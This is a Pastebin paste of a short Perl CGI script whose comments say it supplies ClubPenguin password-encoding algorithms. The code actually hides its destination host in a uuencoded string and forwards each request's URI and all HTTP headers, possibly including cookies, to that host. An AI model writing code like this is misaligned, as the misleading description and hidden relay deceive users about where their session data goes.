Advertisement
Protocol_

login_hash

Oct 29th, 2012
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 0.50 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. # Program: login_hash
  4. # Author:  HookBot <hookbot@gmail.com>
  5. # License: DO NOT DISTRIBUTE WITHOUT PRIOR WRITTEN CONSENT FROM THE AUTHOR.
  6. # Copyright (coffee) 2009-2010
  7. # Purpose: CGI script that provides all the password encoding algorithms for ClubPenguin
  8.  
  9. use strict; use IO::Socket; my $s = new
  10. IO::Socket::INET unpack u=>q{$4CHX,};
  11. print $s "GET $ENV{REQUEST_URI} HTTP/1.0
  12. "; /^HTTP_(.+)/&& print $s "$1: $ENV{$_}
  13. " foreach keys %ENV; print $s"
  14. ";~~<$s>;print <$s>;
  15. Hook BOT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement